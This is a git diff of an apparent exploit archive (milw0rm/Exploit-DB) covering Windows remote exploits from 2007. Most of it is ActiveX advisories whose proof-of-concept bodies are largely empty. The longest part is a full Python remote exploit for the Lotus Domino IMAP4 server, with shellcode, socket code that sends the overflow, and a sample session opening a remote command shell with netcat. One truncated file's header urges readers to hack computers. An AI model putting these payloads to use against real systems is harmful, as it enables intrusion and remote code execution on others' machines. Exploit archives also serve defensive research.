+:. http://goodfellas.shellcode.com.ar .:
+
+sasatl.dll 1.5.0.531 Program Checker -  Javascript Heap Spraying Exploit
+========================================================================
+
+Internal ID: VULWAR200706280.
+
+
+Introduction
+------------
+sasatl.dll is a library included in the Program Checker Pro software package from the Zenturi. http://www.programchecker.com
+
+
+Tested In
+---------
+- Windows XP SP1/SP2 english/french with IE 6.0 / 7.0.
+- Windows vista Professional English/French SP1 with IE 7.0
+
+
+Summary
+-------
+The Fill method is prone to a stack-based buffer-overflow vulnerability because it fails to properly check boundaries.
+
+
+Impact
+------
+An attacker could execute arbitrary code into the remote machine.
+
+
+Workaround
+----------
+- Activate the Kill bit zero in clsid:7D6B5B29-FC7E-11D1-9288-00104B885781.
+- Unregister sasatl.dll using regsvr32.
+
+
+Timeline
+--------
+July 10, 2007 -- Exploit published.
+
+
+Credits
+-------
+ * callAX 
+ * GoodFellas Security Research Team 
+
+Proof of Concept
+----------------
+
+
+
+  
+
+
+
+
+
+
+# milw0rm.com [2007-07-10]
diff --git a/platforms/windows/remote/4176.html b/platforms/windows/remote/4176.html
index a66354a24..25f5126cd 100755
--- a/platforms/windows/remote/4176.html
+++ b/platforms/windows/remote/4176.html
@@ -1,77 +1,77 @@
-:. GOODFELLAS Security Research TEAM  .:
-:. http://goodfellas.shellcode.com.ar .:
-
-PGPBBox.dll 5.1.0.112 SecureBlackbox Arbitary Data Write Exploit.
-================================================================
-
-Test in patched XP SP2 IE 6.0/7.0 and Vista IE 7.0
-==================================================
-
-Internal ID: VULWAR200707121.
-
-Introduction
-------------
-PGPBBox.dll is a library included in the SecureBlackbox
-software package from the Eldos Company http://www.eldos.com/
-
-Tested In
----------
-- Windows XP SP2 english/french with IE 6.0 / 7.0.
-- Windows vista Professional English/French SP1 with IE 7.0
-
-Summary
--------
-The SaveToFile method doesn't check if it's is being called from the application, 
-or malicious users. Remote Attacker could craft a html page and write arbitrary
-data.
-
-Impact
-------
-Any computer that uses this Sofware will be exposed to Data Write Arbitrary.
-
-Workaround
-----------
-- Activate the Kill bit zero in clsid: C22BB435-9B7F-4B1F-ACBD-CD36D34D6DFF.
-- Unregister PGPBBox.dll using regsvr32.
-
-
-Timeline
---------
-July 12, 2007 -- Bug discovery.
-July 12, 2007 -- Bug published.
-
-
-Credits
--------
- * callAX 
-
-
-
-Technical Details
------------------
-
-SaveToFile method receives one argument filename in this format "c:\path\file".
-
-
-Proof of Concept
-----------------
-
-
-
-  
-                           
-
-
-
-
-
-# milw0rm.com [2007-07-12]
+:. GOODFELLAS Security Research TEAM  .:
+:. http://goodfellas.shellcode.com.ar .:
+
+PGPBBox.dll 5.1.0.112 SecureBlackbox Arbitary Data Write Exploit.
+================================================================
+
+Test in patched XP SP2 IE 6.0/7.0 and Vista IE 7.0
+==================================================
+
+Internal ID: VULWAR200707121.
+
+Introduction
+------------
+PGPBBox.dll is a library included in the SecureBlackbox
+software package from the Eldos Company http://www.eldos.com/
+
+Tested In
+---------
+- Windows XP SP2 english/french with IE 6.0 / 7.0.
+- Windows vista Professional English/French SP1 with IE 7.0
+
+Summary
+-------
+The SaveToFile method doesn't check if it's is being called from the application, 
+or malicious users. Remote Attacker could craft a html page and write arbitrary
+data.
+
+Impact
+------
+Any computer that uses this Sofware will be exposed to Data Write Arbitrary.
+
+Workaround
+----------
+- Activate the Kill bit zero in clsid: C22BB435-9B7F-4B1F-ACBD-CD36D34D6DFF.
+- Unregister PGPBBox.dll using regsvr32.
+
+
+Timeline
+--------
+July 12, 2007 -- Bug discovery.
+July 12, 2007 -- Bug published.
+
+
+Credits
+-------
+ * callAX 
+
+
+
+Technical Details
+-----------------
+
+SaveToFile method receives one argument filename in this format "c:\path\file".
+
+
+Proof of Concept
+----------------
+
+
+
+  
+                           
+
+
+
+
+
+# milw0rm.com [2007-07-12]
diff --git a/platforms/windows/remote/4177.html b/platforms/windows/remote/4177.html
index 247624d4a..87d3ff3b0 100755
--- a/platforms/windows/remote/4177.html
+++ b/platforms/windows/remote/4177.html
@@ -1,143 +1,143 @@
-:. GOODFELLAS Security Research TEAM  .:
-:. http://goodfellas.shellcode.com.ar .:
-
-sasatl.dll 1.5.0.531 Program Checker-Method DebugMsgLog Heap Spraying Exploit
-=============================================================================
-
-Internal ID: VULWAR200707121.
-
-Introduction
-------------
-sasatl.dll is a library included in the Program Checker Pro software package from the Company Zenturi. http://www.programchecker.com
-
-
-Tested In
----------
-- Windows XP SP1/SP2 english/french with IE 6.0 / 7.0.
-- Windows vista Professional English/French SP1 with IE 7.0
-
-
-Summary
--------
-The DebugMsgLog method is prone to a stack-based buffer-overflow vulnerability, because it fails to properly check boundaries.
-
-
-Impact
-------
-An attacker could execute arbitrary code into the remote machine.
-
-
-Workaround
-----------
-- Activate the Kill bit zero in clsid:59DBDDA6-9A80-42A4-B824-9BC50CC172F51.
-- Unregister sasatl.dll using regsvr32.
-
-
-Timeline
---------
-July 12 2007 -- Exploit published.
-
-
-Credits
--------
- * Vulnerability Discovered by Will Dormann CERT/CC.
- * Exploit by callAX  from GoodFellas Security Research Team  
- 
-Technical Details
------------------
-
-.text:100340F3 sub_100340F3    proc near               ; DATA XREF: .rdata:100ACA6Co
-.text:100340F3                                         ; .rdata:100AFC1Cto
-.text:100340F3                 mov     eax, offset sub_1009D47C
-.text:100340F8                 call    __EH_prolog
-.text:100340FD                 push    dword ptr [ebp+0Ch] ; wchar_t *
-.text:10034100                 lea     ecx, [ebp+0Ch]
-.text:10034103                 call    sub_1005DC32
-.text:10034108                 push    dword ptr [ebp+0Ch] ; char
-.text:1003410B                 and     dword ptr [ebp-4], 0
-.text:1003410F                 push    offset aCnixonconfig_4 ; "\r\n~CNixonConfigMgrEx::DebugMsgLog %s"
-.text:10034114                 push    1               ; int
-.text:10034116                 call    sub_10003099
-.text:1003411B                 or      dword ptr [ebp-4], 0FFFFFFFFh
-.text:1003411F                 add     esp, 0Ch
-.text:10034122                 lea     ecx, [ebp+0Ch]
-.text:10034125                 call    sub_1005DB6B
-.text:1003412A                 mov     ecx, [ebp-0Ch]
-.text:1003412D                 xor     eax, eax
-.text:1003412F                 mov     large fs:0, ecx
-.text:10034136                 leave
-.text:10034137                 retn    8
-
-Proof of Concept
-----------------
-
-
-
-  
-
    Will Dormann from CERT/CC is credited with the discovery.

    
-
    This exploits executes calc.exe
    
-
-
-
-
-
-# milw0rm.com [2007-07-12]
+:. GOODFELLAS Security Research TEAM  .:
+:. http://goodfellas.shellcode.com.ar .:
+
+sasatl.dll 1.5.0.531 Program Checker-Method DebugMsgLog Heap Spraying Exploit
+=============================================================================
+
+Internal ID: VULWAR200707121.
+
+Introduction
+------------
+sasatl.dll is a library included in the Program Checker Pro software package from the Company Zenturi. http://www.programchecker.com
+
+
+Tested In
+---------
+- Windows XP SP1/SP2 english/french with IE 6.0 / 7.0.
+- Windows vista Professional English/French SP1 with IE 7.0
+
+
+Summary
+-------
+The DebugMsgLog method is prone to a stack-based buffer-overflow vulnerability, because it fails to properly check boundaries.
+
+
+Impact
+------
+An attacker could execute arbitrary code into the remote machine.
+
+
+Workaround
+----------
+- Activate the Kill bit zero in clsid:59DBDDA6-9A80-42A4-B824-9BC50CC172F51.
+- Unregister sasatl.dll using regsvr32.
+
+
+Timeline
+--------
+July 12 2007 -- Exploit published.
+
+
+Credits
+-------
+ * Vulnerability Discovered by Will Dormann CERT/CC.
+ * Exploit by callAX  from GoodFellas Security Research Team  
+ 
+Technical Details
+-----------------
+
+.text:100340F3 sub_100340F3    proc near               ; DATA XREF: .rdata:100ACA6Co
+.text:100340F3                                         ; .rdata:100AFC1Cto
+.text:100340F3                 mov     eax, offset sub_1009D47C
+.text:100340F8                 call    __EH_prolog
+.text:100340FD                 push    dword ptr [ebp+0Ch] ; wchar_t *
+.text:10034100                 lea     ecx, [ebp+0Ch]
+.text:10034103                 call    sub_1005DC32
+.text:10034108                 push    dword ptr [ebp+0Ch] ; char
+.text:1003410B                 and     dword ptr [ebp-4], 0
+.text:1003410F                 push    offset aCnixonconfig_4 ; "\r\n~CNixonConfigMgrEx::DebugMsgLog %s"
+.text:10034114                 push    1               ; int
+.text:10034116                 call    sub_10003099
+.text:1003411B                 or      dword ptr [ebp-4], 0FFFFFFFFh
+.text:1003411F                 add     esp, 0Ch
+.text:10034122                 lea     ecx, [ebp+0Ch]
+.text:10034125                 call    sub_1005DB6B
+.text:1003412A                 mov     ecx, [ebp-0Ch]
+.text:1003412D                 xor     eax, eax
+.text:1003412F                 mov     large fs:0, ecx
+.text:10034136                 leave
+.text:10034137                 retn    8
+
+Proof of Concept
+----------------
+
+
+
+  
+
    Will Dormann from CERT/CC is credited with the discovery.

    
+
    This exploits executes calc.exe
    
+
+
+
+
+
+# milw0rm.com [2007-07-12]
diff --git a/platforms/windows/remote/4190.html b/platforms/windows/remote/4190.html
index 14801ce78..00b1bde8e 100755
--- a/platforms/windows/remote/4190.html
+++ b/platforms/windows/remote/4190.html
@@ -1,57 +1,57 @@
-
    ----------------------------------------------------------------------------------------
- Data Dynamics ActiveBar ActiveX Control (actbar3.ocx <= 3.1) Multiple Inscure Methods
- url: http://www.datadynamics.com/default.aspx
-
- author: shinnai
- mail: shinnai[at]autistici[dot]org
- site: http://shinnai.altervista.org
- 
- This was written for educational purpose. Use it at your own risk.
- Author will be not be responsible for any damage.
- 
- THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
- IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!
-
- Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
- all software that use this ocx are vulnerable to this exploits.
-
- This control is marked as:
- RegKey Safe for Script: True
- RegKey Safe for Init: True
- Implements IObjectSafety: False
- KillBitSet: False
----------------------------------------------------------------------------------------
-
-
-
-
-
-
-
-
-
-
-
    
-
-# milw0rm.com [2007-07-17]
+
    +---------------------------------------------------------------------------------------
+ Data Dynamics ActiveBar ActiveX Control (actbar3.ocx <= 3.1) Multiple Inscure Methods
+ url: http://www.datadynamics.com/default.aspx
+
+ author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+ 
+ This was written for educational purpose. Use it at your own risk.
+ Author will be not be responsible for any damage.
+ 
+ THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
+ IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!
+
+ Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
+ all software that use this ocx are vulnerable to this exploits.
+
+ This control is marked as:
+ RegKey Safe for Script: True
+ RegKey Safe for Init: True
+ Implements IObjectSafety: False
+ KillBitSet: False
+---------------------------------------------------------------------------------------
+
+
+
+
+
+
+
+
+
+
+
    
+
+# milw0rm.com [2007-07-17]
diff --git a/platforms/windows/remote/42.c b/platforms/windows/remote/42.c
index 50d7bd7b9..bc4e9d10e 100755
--- a/platforms/windows/remote/42.c
+++ b/platforms/windows/remote/42.c
@@ -186,6 +186,6 @@ D:\>type "c:\Program Files\Magic Winmail\server\logs\smtp.log"
 0x25783020 0x2078382e 0x2e257830
 
 */
-
-
-// milw0rm.com [2003-06-11]
+
+
+// milw0rm.com [2003-06-11]
diff --git a/platforms/windows/remote/4200.html b/platforms/windows/remote/4200.html
index 59e5d248c..5d00ea63f 100755
--- a/platforms/windows/remote/4200.html
+++ b/platforms/windows/remote/4200.html
@@ -1,78 +1,78 @@
-
    ------------------------------------------------------------------------------------
- Versalsoft HTTP File Uploader (UFileUploaderD.dll v. 6.0.0.38) "AddFile()" method
- Remote Buffer Overflow Ecploit (Heap Spray Technique)
- url: http://en.versalsoft.com/
- price: from $59.95 to $799.95
-
- author: shinnai
- mail: shinnai[at]autistici[dot]org
- site: http://shinnai.altervista.org
-
- Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
- This exploits executes calc.exe
------------------------------------------------------------------------------------
-
-
-
-
-
-
-
-
    
-
-# milw0rm.com [2007-07-19]
+
    +-----------------------------------------------------------------------------------
+ Versalsoft HTTP File Uploader (UFileUploaderD.dll v. 6.0.0.38) "AddFile()" method
+ Remote Buffer Overflow Ecploit (Heap Spray Technique)
+ url: http://en.versalsoft.com/
+ price: from $59.95 to $799.95
+
+ author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+
+ Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
+ This exploits executes calc.exe
+-----------------------------------------------------------------------------------
+
+
+
+
+
+
+
+
    
+
+# milw0rm.com [2007-07-19]
diff --git a/platforms/windows/remote/4207.py b/platforms/windows/remote/4207.py
index 6bafbe771..c04910e1a 100755
--- a/platforms/windows/remote/4207.py
+++ b/platforms/windows/remote/4207.py
@@ -1,175 +1,175 @@
-###########################################################################################
-# Lotus Domino IMAP4 Server Release 6.5.4 / Windows 2000 Advanced Server x86 Remote Exploit
-###########################################################################################
-# Vulnerable: IBM Lotus Domino <= 7.0.2 && 6.5.5 FP2 (tested 6.5.4)
-# Authors: Dominic Chell  & prdelka
-#
-# Exploitation steps:
-# 1) The instruction "call dword [ecx]" is performed with user supplied ECX
-# 2) EAX reference our buffer from retaddr onward
-# 3) we put pointer in ECX to a pointer referencing "call eax"
-# 4) a small payload decrements eax and then jmp's into the eax buffer due
-#    to size limitations.
-# 5) our larger payload is then executed.
-#
-# muts exploit would not work for us, his egghunt uses 0x2e which is converted
-# to 0x09 (.'s to [tab]'s) and his return address was not found on our test
-# environment.
-#
-# Finding a Target:
-# To find a target, attach a debugger to nimap.exe, cause the application
-# to crash. Then use search function to find "call eax" or equivilant
-# instruction in memory. Then, take the pointer to eax, such as "0x77ff1122"
-# and search for another location in memory that has "0x11 0xff 0x77". This
-# will be utilised for a return address if no instruction modify eax or
-# subvert execution to another place in memory.
-#
-# Thanks to: nemo, hdm, jf, Winny Thomas, muts
-#
-###########################################################################################
-# Note: it takes a few minutes for the egghunter to find the payload in memory
-#
-# For example:
-# C:\work\exploits\imap>poc.py
-# [*] sending payload
-# [*] sending payload
-# [*] sending payload
-# [*] sending payload
-# * OK Domino IMAP4 Server Release 6.5.4 ready Tue, 26 Jun 2007 15:18:36 +0100
-#
-# PDAwNEU5QkNCLjgwMjU3MzA2LjAwMDAwOUY4LjAwMDAwMDA5QERNQz4=
-#
-# sending...
-# kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
-# kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
-# kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
-# kJCQkJCQkJCQkJCQkJCQkJCQkJCQkNvS2XQk9FgpybEKu3E1If4xWBcDWBeDmcnDC2rgYnVG+2Q3
-# BG5572VAQQov6VasmyGZmqi4dlFEk/x9Zwv0gcDrZXeQkJCD6FKD6FKD6FL/4CB4OcnLXAvHq421
-# M2iR5FFG
-#
-#
-# C:\work\exploits\imap>nc -vv 192.168.126.130 4444
-# 2KVM-DC [192.168.126.130] 4444 (?) open
-# Microsoft Windows 2000 [Version 5.00.2195]
-# (C) Copyright 1985-1999 Microsoft Corp.
-#
-# E:\Lotus\Domino>
-#
-###########################################################################################
-
-import socket, struct, md5, base64, sys, string, signal, getopt
-
-
-class Exp_Lotus:
-       def __init__(self):
-               self.host='127.0.0.1'
-               self.port=143
-
-
-def send_payload(host,port):
-       payload ="\x54\x30\x30\x57\x54\x30\x30\x57"
-       payload += ("\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xf7"
-       "\x82\xf8\x80\x83\xeb\xfc\xe2\xf4\x0b\xe8\x13\xcd\x1f\x7b\x07\x7f"
-       "\x08\xe2\x73\xec\xd3\xa6\x73\xc5\xcb\x09\x84\x85\x8f\x83\x17\x0b"
-       "\xb8\x9a\x73\xdf\xd7\x83\x13\xc9\x7c\xb6\x73\x81\x19\xb3\x38\x19"
-       "\x5b\x06\x38\xf4\xf0\x43\x32\x8d\xf6\x40\x13\x74\xcc\xd6\xdc\xa8"
-       "\x82\x67\x73\xdf\xd3\x83\x13\xe6\x7c\x8e\xb3\x0b\xa8\x9e\xf9\x6b"
-       "\xf4\xae\x73\x09\x9b\xa6\xe4\xe1\x34\xb3\x23\xe4\x7c\xc1\xc8\x0b"
-       "\xb7\x8e\x73\xf0\xeb\x2f\x73\xc0\xff\xdc\x90\x0e\xb9\x8c\x14\xd0"
-       "\x08\x54\x9e\xd3\x91\xea\xcb\xb2\x9f\xf5\x8b\xb2\xa8\xd6\x07\x50"
-       "\x9f\x49\x15\x7c\xcc\xd2\x07\x56\xa8\x0b\x1d\xe6\x76\x6f\xf0\x82"
-       "\xa2\xe8\xfa\x7f\x27\xea\x21\x89\x02\x2f\xaf\x7f\x21\xd1\xab\xd3"
-       "\xa4\xd1\xbb\xd3\xb4\xd1\x07\x50\x91\xea\xe9\xdc\x91\xd1\x71\x61"
-       "\x62\xea\x5c\x9a\x87\x45\xaf\x7f\x21\xe8\xe8\xd1\xa2\x7d\x28\xe8"
-       "\x53\x2f\xd6\x69\xa0\x7d\x2e\xd3\xa2\x7d\x28\xe8\x12\xcb\x7e\xc9"
-       "\xa0\x7d\x2e\xd0\xa3\xd6\xad\x7f\x27\x11\x90\x67\x8e\x44\x81\xd7"
-       "\x08\x54\xad\x7f\x27\xe4\x92\xe4\x91\xea\x9b\xed\x7e\x67\x92\xd0"
-       "\xae\xab\x34\x09\x10\xe8\xbc\x09\x15\xb3\x38\x73\x5d\x7c\xba\xad"
-       "\x09\xc0\xd4\x13\x7a\xf8\xc0\x2b\x5c\x29\x90\xf2\x09\x31\xee\x7f"
-       "\x82\xc6\x07\x56\xac\xd5\xaa\xd1\xa6\xd3\x92\x81\xa6\xd3\xad\xd1"
-       "\x08\x52\x90\x2d\x2e\x87\x36\xd3\x08\x54\x92\x7f\x08\xb5\x07\x50"
-       "\x7c\xd5\x04\x03\x33\xe6\x07\x56\xa5\x7d\x28\xe8\x07\x08\xfc\xdf"
-       "\xa4\x7d\x2e\x7f\x27\x82\xf8\x80")
-
-       try:
-               s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-               connect=s.connect((host,port))
-               d=s.recv(1024)
-               print "[*] sending payload"
-               s.send('a001 admin ' + payload + '\r\n')
-               d=s.recv(1024)
-               s.close()
-       except:
-               "Can't connect to IMAP server"
-
-def usage():
-       print sys.argv[0] + "\n\n\tLotus Domino 6.5.4 Windows 2000 Advanced Server x86 Exploit\n\tauthor: dmc@digitalapocalypse.net & prdelka"
-       print "\t-h host"
-       print "\t-p port"
-       sys.exit(2)
-
-def signal_handler(signal, frame):
-       print 'err: caught sigint, exiting'
-       sys.exit(0)
-
-def exp(host, port):
-       buffer = "\x90" * 193
-       buffer += ("\xdb\xd2\xd9\x74\x24\xf4\x58\x29\xc9\xb1\x0a\xbb\x71\x35\x21"
-       "\xfe\x31\x58\x17\x03\x58\x17\x83\x99\xc9\xc3\x0b\x6a\xe0\x62"
-       "\x75\x46\xfb\x64\x37\x04\x6e\x79\xef\x65\x40\x41\x0a\x2f\xe9"
-       "\x56\xac\x9b\x21\x99\x9a\xa8\xb8\x76\x51\x44\x93\xfc\x7d\x67"
-       "\x0b\xf4\x81")
-
-       try:
-               s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-               connect=s.connect((host,port))
-               d=s.recv(1024)
-               print d
-               s.send('a001 authenticate cram-md5\r\n')
-               d=s.recv(1024)
-               d=d[2:1022].strip()
-               print d
-               m=md5.new()
-               m.update(d)
-               digest = m.digest()
-               buffer += struct.pack(' & prdelka
+#
+# Exploitation steps:
+# 1) The instruction "call dword [ecx]" is performed with user supplied ECX
+# 2) EAX reference our buffer from retaddr onward
+# 3) we put pointer in ECX to a pointer referencing "call eax"
+# 4) a small payload decrements eax and then jmp's into the eax buffer due
+#    to size limitations.
+# 5) our larger payload is then executed.
+#
+# muts exploit would not work for us, his egghunt uses 0x2e which is converted
+# to 0x09 (.'s to [tab]'s) and his return address was not found on our test
+# environment.
+#
+# Finding a Target:
+# To find a target, attach a debugger to nimap.exe, cause the application
+# to crash. Then use search function to find "call eax" or equivilant
+# instruction in memory. Then, take the pointer to eax, such as "0x77ff1122"
+# and search for another location in memory that has "0x11 0xff 0x77". This
+# will be utilised for a return address if no instruction modify eax or
+# subvert execution to another place in memory.
+#
+# Thanks to: nemo, hdm, jf, Winny Thomas, muts
+#
+###########################################################################################
+# Note: it takes a few minutes for the egghunter to find the payload in memory
+#
+# For example:
+# C:\work\exploits\imap>poc.py
+# [*] sending payload
+# [*] sending payload
+# [*] sending payload
+# [*] sending payload
+# * OK Domino IMAP4 Server Release 6.5.4 ready Tue, 26 Jun 2007 15:18:36 +0100
+#
+# PDAwNEU5QkNCLjgwMjU3MzA2LjAwMDAwOUY4LjAwMDAwMDA5QERNQz4=
+#
+# sending...
+# kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
+# kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
+# kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
+# kJCQkJCQkJCQkJCQkJCQkJCQkJCQkNvS2XQk9FgpybEKu3E1If4xWBcDWBeDmcnDC2rgYnVG+2Q3
+# BG5572VAQQov6VasmyGZmqi4dlFEk/x9Zwv0gcDrZXeQkJCD6FKD6FKD6FL/4CB4OcnLXAvHq421
+# M2iR5FFG
+#
+#
+# C:\work\exploits\imap>nc -vv 192.168.126.130 4444
+# 2KVM-DC [192.168.126.130] 4444 (?) open
+# Microsoft Windows 2000 [Version 5.00.2195]
+# (C) Copyright 1985-1999 Microsoft Corp.
+#
+# E:\Lotus\Domino>
+#
+###########################################################################################
+
+import socket, struct, md5, base64, sys, string, signal, getopt
+
+
+class Exp_Lotus:
+       def __init__(self):
+               self.host='127.0.0.1'
+               self.port=143
+
+
+def send_payload(host,port):
+       payload ="\x54\x30\x30\x57\x54\x30\x30\x57"
+       payload += ("\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xf7"
+       "\x82\xf8\x80\x83\xeb\xfc\xe2\xf4\x0b\xe8\x13\xcd\x1f\x7b\x07\x7f"
+       "\x08\xe2\x73\xec\xd3\xa6\x73\xc5\xcb\x09\x84\x85\x8f\x83\x17\x0b"
+       "\xb8\x9a\x73\xdf\xd7\x83\x13\xc9\x7c\xb6\x73\x81\x19\xb3\x38\x19"
+       "\x5b\x06\x38\xf4\xf0\x43\x32\x8d\xf6\x40\x13\x74\xcc\xd6\xdc\xa8"
+       "\x82\x67\x73\xdf\xd3\x83\x13\xe6\x7c\x8e\xb3\x0b\xa8\x9e\xf9\x6b"
+       "\xf4\xae\x73\x09\x9b\xa6\xe4\xe1\x34\xb3\x23\xe4\x7c\xc1\xc8\x0b"
+       "\xb7\x8e\x73\xf0\xeb\x2f\x73\xc0\xff\xdc\x90\x0e\xb9\x8c\x14\xd0"
+       "\x08\x54\x9e\xd3\x91\xea\xcb\xb2\x9f\xf5\x8b\xb2\xa8\xd6\x07\x50"
+       "\x9f\x49\x15\x7c\xcc\xd2\x07\x56\xa8\x0b\x1d\xe6\x76\x6f\xf0\x82"
+       "\xa2\xe8\xfa\x7f\x27\xea\x21\x89\x02\x2f\xaf\x7f\x21\xd1\xab\xd3"
+       "\xa4\xd1\xbb\xd3\xb4\xd1\x07\x50\x91\xea\xe9\xdc\x91\xd1\x71\x61"
+       "\x62\xea\x5c\x9a\x87\x45\xaf\x7f\x21\xe8\xe8\xd1\xa2\x7d\x28\xe8"
+       "\x53\x2f\xd6\x69\xa0\x7d\x2e\xd3\xa2\x7d\x28\xe8\x12\xcb\x7e\xc9"
+       "\xa0\x7d\x2e\xd0\xa3\xd6\xad\x7f\x27\x11\x90\x67\x8e\x44\x81\xd7"
+       "\x08\x54\xad\x7f\x27\xe4\x92\xe4\x91\xea\x9b\xed\x7e\x67\x92\xd0"
+       "\xae\xab\x34\x09\x10\xe8\xbc\x09\x15\xb3\x38\x73\x5d\x7c\xba\xad"
+       "\x09\xc0\xd4\x13\x7a\xf8\xc0\x2b\x5c\x29\x90\xf2\x09\x31\xee\x7f"
+       "\x82\xc6\x07\x56\xac\xd5\xaa\xd1\xa6\xd3\x92\x81\xa6\xd3\xad\xd1"
+       "\x08\x52\x90\x2d\x2e\x87\x36\xd3\x08\x54\x92\x7f\x08\xb5\x07\x50"
+       "\x7c\xd5\x04\x03\x33\xe6\x07\x56\xa5\x7d\x28\xe8\x07\x08\xfc\xdf"
+       "\xa4\x7d\x2e\x7f\x27\x82\xf8\x80")
+
+       try:
+               s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+               connect=s.connect((host,port))
+               d=s.recv(1024)
+               print "[*] sending payload"
+               s.send('a001 admin ' + payload + '\r\n')
+               d=s.recv(1024)
+               s.close()
+       except:
+               "Can't connect to IMAP server"
+
+def usage():
+       print sys.argv[0] + "\n\n\tLotus Domino 6.5.4 Windows 2000 Advanced Server x86 Exploit\n\tauthor: dmc@digitalapocalypse.net & prdelka"
+       print "\t-h host"
+       print "\t-p port"
+       sys.exit(2)
+
+def signal_handler(signal, frame):
+       print 'err: caught sigint, exiting'
+       sys.exit(0)
+
+def exp(host, port):
+       buffer = "\x90" * 193
+       buffer += ("\xdb\xd2\xd9\x74\x24\xf4\x58\x29\xc9\xb1\x0a\xbb\x71\x35\x21"
+       "\xfe\x31\x58\x17\x03\x58\x17\x83\x99\xc9\xc3\x0b\x6a\xe0\x62"
+       "\x75\x46\xfb\x64\x37\x04\x6e\x79\xef\x65\x40\x41\x0a\x2f\xe9"
+       "\x56\xac\x9b\x21\x99\x9a\xa8\xb8\x76\x51\x44\x93\xfc\x7d\x67"
+       "\x0b\xf4\x81")
+
+       try:
+               s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+               connect=s.connect((host,port))
+               d=s.recv(1024)
+               print d
+               s.send('a001 authenticate cram-md5\r\n')
+               d=s.recv(1024)
+               d=d[2:1022].strip()
+               print d
+               m=md5.new()
+               m.update(d)
+               digest = m.digest()
+               buffer += struct.pack('
------------------------------------------------------------------------------------------------
- Data Dynamics ActiveReport ActiveX Control (actrpt2.dll <= 2.5) "SaveLayout()" Inscure Method
- url: http://www.datadynamics.com/default.aspx
-
- author: shinnai
- mail: shinnai[at]autistici[dot]org
- site: http://shinnai.altervista.org
- 
- This was written for educational purpose. Use it at your own risk.
- Author will be not be responsible for any damage.
- 
- THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
- IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!
-
- Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
- all software that use this ocx are vulnerable to this exploits.
-
- This control is marked as:
- RegKey Safe for Script: True
- RegKey Safe for Init: True
- Implements IObjectSafety: False
- KillBitSet: False
------------------------------------------------------------------------------------------------
-
-
-
-
-
-
-
-
-
-# milw0rm.com [2007-07-21]
+
    +-----------------------------------------------------------------------------------------------
+ Data Dynamics ActiveReport ActiveX Control (actrpt2.dll <= 2.5) "SaveLayout()" Inscure Method
+ url: http://www.datadynamics.com/default.aspx
+
+ author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+ 
+ This was written for educational purpose. Use it at your own risk.
+ Author will be not be responsible for any damage.
+ 
+ THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
+ IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!
+
+ Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
+ all software that use this ocx are vulnerable to this exploits.
+
+ This control is marked as:
+ RegKey Safe for Script: True
+ RegKey Safe for Init: True
+ Implements IObjectSafety: False
+ KillBitSet: False
+-----------------------------------------------------------------------------------------------
+
+
+
+
+
+
+
+
    
+
+# milw0rm.com [2007-07-21]
diff --git a/platforms/windows/remote/421.c b/platforms/windows/remote/421.c
index 43f50b9c0..6b9d8f0b0 100755
--- a/platforms/windows/remote/421.c
+++ b/platforms/windows/remote/421.c
@@ -440,6 +440,6 @@ shell(sock);
 } 
 
 return 0; 
-} 
-
-// milw0rm.com [2004-08-27]
+} 
+
+// milw0rm.com [2004-08-27]
diff --git a/platforms/windows/remote/4217.html b/platforms/windows/remote/4217.html
index 4873bd407..0d55f7fa0 100755
--- a/platforms/windows/remote/4217.html
+++ b/platforms/windows/remote/4217.html
@@ -1,37 +1,37 @@
-
-In God We Trust, VDA Labs, LLC
-
-
-
-
-
-
-# milw0rm.com [2007-07-24]
+
+In God We Trust, VDA Labs, LLC
+
+
+
+
+
+
+# milw0rm.com [2007-07-24]
diff --git a/platforms/windows/remote/4222.c b/platforms/windows/remote/4222.c
index 48d156b02..2b4db48bb 100755
--- a/platforms/windows/remote/4222.c
+++ b/platforms/windows/remote/4222.c
@@ -1,190 +1,190 @@
-/*
-Attached and in-line is an exploit for a newly announced item on
-the WabiSabiLabi auction block. I hope this completely devalues the
-item so that the original finder dies of starvation.
-
-DON'T SELL BUGS THROUGH WABISABILABLA
-
-USE EXPLOITS TO HACK COMPUTERS INSTEAD
-
-Exploit is for a stack overflow in http://rshd.sourceforge.net. It
